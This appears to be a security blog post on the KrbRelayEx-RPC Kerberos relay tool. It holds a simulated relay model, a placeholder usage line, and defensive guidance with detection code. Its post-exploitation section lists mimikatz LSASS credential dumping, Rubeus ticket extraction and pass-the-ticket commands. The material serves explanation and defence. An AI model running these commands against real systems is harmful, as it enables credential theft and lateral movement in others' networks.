GitHub – decoder-it/KrbRelayEx-RPC


KrbRelayEx-RPC is a Kerberos relay tool by decoder-it that targets RPC services. It is intended for penetration testing and red team engagements, where it demonstrates how a client's Kerberos authentication to a service can be relayed when that service does not enforce message integrity or privacy.

GitHub Repository: decoder-it/KrbRelayEx-RPC

You Should Know:

1. Understanding Kerberos Relay Attacks

A Kerberos relay attack intercepts a client's AP-REQ (the service ticket plus authenticator the client sends when authenticating to a service) and forwards it to the real service, so the attacker is authenticated as that client without knowing its password or the session key. Unlike NTLM relay, a Kerberos ticket is bound to a specific SPN, so the attacker must first cause the victim to authenticate to the target's name while actually connecting to the attacker (a man-in-the-middle position, typically gained through DNS or other name-resolution spoofing). This tool focuses on relaying to RPC services, which are widespread in Active Directory environments and frequently accept authentication without requiring packet integrity.

2. Key Features of KrbRelayEx-RPC

  • Relays a victim's Kerberos AP-REQ (service ticket plus authenticator) to an RPC endpoint.
  • Works against RPC endpoints that accept the authentication without requiring per-message integrity or privacy. The relay never obtains the session key inside the ticket, so targets that enforce signing or sealing (or channel binding/EPA on TLS-wrapped services) are not exploitable this way.
  • Useful for lateral movement in Active Directory.
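The mechanics described in sections 1 and 2, as an added toy model that is not code from the KrbRelayEx-RPC project: a KDC issues the victim a ticket for the target's SPN, the victim sends its AP-REQ to the attacker's listener, and the attacker forwards it unchanged. The target authenticates the victim, but the relay never learns the session key, so the same relay that succeeds against an endpoint accepting a bare AP-REQ is rejected once the endpoint requires each message to be signed. Everything here is constructed: the "encryption" is a SHA-256 counter keystream with an HMAC tag (not real Kerberos crypto), the keys are random bytes, and the principal names and RPC request strings are made up.

```python
"""Added example, not code from the KrbRelayEx-RPC project: why a Kerberos relay
works against an RPC endpoint that accepts a bare AP-REQ and fails once the
endpoint requires per-message signing with the session key.

Assumptions (not real Kerberos): 'encryption' is a SHA-256 counter keystream
plus an HMAC tag, keys are random 32-byte strings, names are made up."""
import hashlib
import hmac
import json
import os

TAG_LEN, NONCE_LEN = 32, 12


def _keystream(key, nonce, n):
    out, ctr = b"", 0
    while len(out) < n:
        out += hashlib.sha256(key + nonce + ctr.to_bytes(4, "big")).digest()
        ctr += 1
    return out[:n]


def seal(key, obj):
    """Encrypt-then-MAC a JSON-serialisable dict; only holders of key can open it."""
    pt = json.dumps(obj).encode()
    nonce = os.urandom(NONCE_LEN)
    ct = bytes(a ^ b for a, b in zip(pt, _keystream(key, nonce, len(pt))))
    return nonce + ct + hmac.new(key, nonce + ct, hashlib.sha256).digest()


def unseal(key, blob):
    nonce, ct, tag = blob[:NONCE_LEN], blob[NONCE_LEN:-TAG_LEN], blob[-TAG_LEN:]
    if not hmac.compare_digest(tag, hmac.new(key, nonce + ct, hashlib.sha256).digest()):
        raise ValueError("bad tag")
    return json.loads(bytes(a ^ b for a, b in zip(ct, _keystream(key, nonce, len(ct)))))


def kdc_issue_ticket(service_key, client):
    """TGS-REP: ticket sealed under the service's key; session key also handed to the client."""
    session_key = os.urandom(32)
    ticket = seal(service_key, {"client": client, "session_key": session_key.hex()})
    return ticket, session_key


def build_ap_req(ticket, session_key, client):
    """AP-REQ = ticket (opaque to the client) + authenticator sealed under the session key."""
    return {"ticket": ticket.hex(), "authenticator": seal(session_key, {"client": client}).hex()}


class RpcService:
    def __init__(self, service_key, require_signing):
        self.key, self.require_signing = service_key, require_signing

    def accept(self, ap_req):
        """Validate the AP-REQ and return a security context bound to its session key."""
        ticket = unseal(self.key, bytes.fromhex(ap_req["ticket"]))
        session_key = bytes.fromhex(ticket["session_key"])
        authenticator = unseal(session_key, bytes.fromhex(ap_req["authenticator"]))
        if authenticator["client"] != ticket["client"]:
            raise ValueError("authenticator does not match ticket")
        return {"client": ticket["client"], "session_key": session_key}

    def call(self, ctx, request, signature=None):
        """Serve an RPC request; with signing required, each message needs a session-key MAC."""
        if self.require_signing:
            expected = hmac.new(ctx["session_key"], request, hashlib.sha256).digest()
            if signature is None or not hmac.compare_digest(expected, signature):
                return "REJECTED: missing or invalid message signature"
        return f"OK: {request.decode()} as {ctx['client']}"


def relay_attack(require_signing):
    """Victim 'alice' sends an AP-REQ for the target's SPN to the attacker's listener;
    the attacker forwards it unchanged and never learns the session key."""
    service_key = os.urandom(32)
    target = RpcService(service_key, require_signing)
    ticket, session_key = kdc_issue_ticket(service_key, "alice")
    ap_req = build_ap_req(ticket, session_key, "alice")   # captured by the relay
    ctx = target.accept(ap_req)                           # target authenticates 'alice'
    return target.call(ctx, b"CreateService evil")        # the relay cannot sign this


def legitimate_call(require_signing=True):
    """Control case: the real client holds the session key and can sign its requests."""
    service_key = os.urandom(32)
    target = RpcService(service_key, require_signing)
    ticket, session_key = kdc_issue_ticket(service_key, "alice")
    ctx = target.accept(build_ap_req(ticket, session_key, "alice"))
    request = b"QueryService"
    return target.call(ctx, request, hmac.new(session_key, request, hashlib.sha256).digest())


if __name__ == "__main__":
    print("no signing required:", relay_attack(False))
    print("signing required:   ", relay_attack(True))
    print("real client, signed:", legitimate_call())
```

The point to take from the model is that the relay's success is decided by the target's authentication-level requirement, not by anything the attacker controls: once the endpoint insists on integrity (packet integrity/privacy on RPC, signing on SMB or LDAP) the forwarded AP-REQ authenticates but cannot be used for a single request.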

3. Practical Usage & Commands

Prerequisites:

  • A compromised machine inside the target network from which the victim's traffic can be redirected to the attacker's listener (for example by controlling a DNS name the victim connects to).
  • Knowledge of Kerberos authentication mechanics.

Example Command to Execute KrbRelayEx-RPC (the interpreter and option names below are placeholders; check the repository README for the actual invocation and flags):

python KrbRelayEx-RPC.py -t <TARGET_HOST> -u <USERNAME> -d <DOMAIN> -p <PORT>

Post-Exploitation Steps:

1. Dump LSASS Memory for Credentials:

mimikatz.exe "sekurlsa::logonpasswords" "exit"

2. Extract Kerberos Tickets:

Rubeus.exe dump /nowrap

3. Perform Pass-the-Ticket Attack:

Rubeus.exe ptt /ticket:<BASE64_TICKET>

4. Defensive Measures (Blue Team)

  • Require integrity or privacy on the services an attacker would relay to: packet integrity/privacy authentication level on RPC interfaces, SMB signing, and LDAP signing plus channel binding. A relay forwards the AP-REQ but never obtains the session key, so it cannot sign or seal the messages that follow.
  • Harden the name-resolution path the man-in-the-middle position depends on: disable LLMNR, NBT-NS and mDNS where unused, restrict who can create or update DNS records (ADIDNS), and alert on unexpected record changes.
  • Monitor in a SIEM for Kerberos network logons whose source address does not match the account's usual host, and for RPC authentication from unexpected sources.
  • Restricting NTLM is still worthwhile but does not stop Kerberos relay; Kerberos relay is used precisely where NTLM is already restricted.

Example Detection Query (Sigma rule skeleton):

    title: Suspicious Kerberos Relay Attempt
    description: Detects potential Kerberos relay attacks via RPC
    logsource:
      product: windows
      service: security
    detection:
      selection:
        EventID: 4769
        ServiceName: 'RPCSS'
      condition: selection

Caveat: in event 4769 (a Kerberos service ticket was requested) ServiceName is the account the SPN is registered to (for example SRV01$), not the protocol the ticket is later used with, so the 'RPCSS' filter above will not match a relay. The 4769 itself also looks legitimate, because the victim really did request a ticket for the target. Treat the rule as a skeleton to adapt: the more useful signal is the target's 4624 logon event (Logon Type 3, Authentication Package Kerberos) whose IpAddress is not the host the account is expected to log on from.
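The 4624-based heuristic just described, as an added example that is not part of the original post or the KrbRelayEx-RPC project: after a relay, the target host records the victim account logging on over the network from the relay host, so comparing each Kerberos network logon's source address against a baseline of where that account normally comes from surfaces the relayed logon. The key=value event format, the baseline inventory, the account names and the IP addresses are all constructed for the example; a real deployment would read the fields from EVTX/XML and build the baseline from asset inventory or DHCP leases.

```python
"""Added example (not from the KrbRelayEx-RPC repository): flag Kerberos network
logons (event 4624) whose source IP is not where the account normally logs on
from. Event format, inventory, names and addresses are constructed sample data."""

# Constructed baseline: account -> set of source IPs it legitimately logs on from.
EXPECTED_SOURCES = {
    "WS01$": {"10.0.0.11"},
    "WS02$": {"10.0.0.12"},
    "alice": {"10.0.0.21"},
}


def parse_event(line):
    """Parse 'Key=Value Key=Value ...' into a dict (constructed format, not EVTX)."""
    fields = {}
    for token in line.split():
        key, _, value = token.partition("=")
        fields[key] = value
    return fields


def is_relay_candidate(ev, inventory=EXPECTED_SOURCES):
    """True for a Kerberos network logon (type 3) from a source IP outside the baseline."""
    if ev.get("EventID") != "4624" or ev.get("LogonType") != "3":
        return False
    if ev.get("AuthenticationPackageName", "").lower() != "kerberos":
        return False
    expected = inventory.get(ev.get("TargetUserName", ""))
    if expected is None:
        return False  # no baseline for this account, so nothing to compare against
    return ev.get("IpAddress") not in expected


def find_relay_candidates(lines, inventory=EXPECTED_SOURCES):
    """Return (account, source_ip) pairs for events that match the heuristic."""
    hits = []
    for line in lines:
        ev = parse_event(line)
        if is_relay_candidate(ev, inventory):
            hits.append((ev["TargetUserName"], ev["IpAddress"]))
    return hits


# Constructed sample events as seen on the target; 10.0.0.99 plays the relay host.
SAMPLE_EVENTS = [
    "EventID=4624 TargetUserName=WS01$ LogonType=3 AuthenticationPackageName=Kerberos IpAddress=10.0.0.11",
    "EventID=4624 TargetUserName=WS01$ LogonType=3 AuthenticationPackageName=Kerberos IpAddress=10.0.0.99",
    "EventID=4624 TargetUserName=alice LogonType=3 AuthenticationPackageName=Kerberos IpAddress=10.0.0.99",
    "EventID=4624 TargetUserName=alice LogonType=3 AuthenticationPackageName=NTLM IpAddress=10.0.0.99",
    "EventID=4624 TargetUserName=bob LogonType=2 AuthenticationPackageName=Kerberos IpAddress=127.0.0.1",
    "EventID=4769 TargetUserName=alice ServiceName=SRV01$ IpAddress=10.0.0.21",
]

if __name__ == "__main__":
    for account, ip in find_relay_candidates(SAMPLE_EVENTS):
        print(f"possible relayed Kerberos logon: {account} from {ip}")
```

The NTLM logon from the same address is deliberately left to a separate NTLM-relay rule, and the 4769 line shows why it is not the right event: its source address is the victim's own workstation, because the victim genuinely requested the ticket. Machine accounts give the cleanest baseline (one host, one address); for user accounts, expect to tune the inventory or the heuristic will be noisy.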

What Undercode Says:

KrbRelayEx-RPC is a powerful tool for red teams, but its misuse can lead to severe security breaches. Defenders must require signing or privacy on the services an attacker would relay to, harden name resolution, and monitor for relayed logons.

Additional Useful Commands:

  • Check cached Kerberos tickets (klist exists on both Linux and Windows):
    klist
    
  • Force Kerberos Ticket Renewal:
    kinit -R
    
  • List SPNs (Service Principal Names):
    setspn -L <USER>
    
  • Windows Event Log for Kerberos Events:
    Get-WinEvent -FilterHashtable @{LogName='Security'; ID=4769}
    


References:

Reported By: Florian Hansemann – Hackers Feeds